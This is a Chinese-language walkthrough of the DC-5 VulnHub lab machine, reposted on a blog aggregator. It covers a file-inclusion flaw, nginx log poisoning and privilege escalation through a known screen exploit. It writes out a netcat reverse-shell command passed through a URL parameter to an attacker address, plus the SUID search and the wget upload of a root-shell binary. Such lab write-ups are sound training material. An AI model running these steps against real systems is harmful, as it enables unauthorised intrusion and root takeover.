DC-5 vulnhub靶机实战
生活随笔
收集整理的這篇文章主要介紹了
DC-5 vulnhub靶机实战
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
首先是使用virtualbox安裝,這里不推薦vmware,會出很多問題。
nmap掃一下子網,看靶機的ip地址:
發現ip是192.168.240.137,開放了80和111端口。
給了提示是個文件包含漏洞,發現在thinkyou.php里面存在,驗證一下。
可以讀到/etc/passwd文件。
接下來就可以利用nginx的日志記錄功能,將一句話寫入到access.log里面,然后用thankyou.php?file=*來執行php語句。
接下來利用nc反彈shell
kali上監聽:nc -nlvp 1234
瀏覽器訪問:http://192.168.240.137/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.240.175 1234
可以看的已經彈回了一個shell.
接下來進行提權:
find / -perm -u=s -type f 2>/dev/null
看看這個用戶有什么root權限命令
看到一個奇怪的screen,搜搜有什么漏洞。
我們用第一個41154.sh.
按步驟在kali上編譯好libhax.so和rootshell,用wget上傳到靶機上,執行
這時候執行/tmp/rootshell可以獲得一個root shell.
總結
以上是生活随笔為你收集整理的DC-5 vulnhub靶机实战的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: php reverseShell
- 下一篇: kali下fcrackzip使用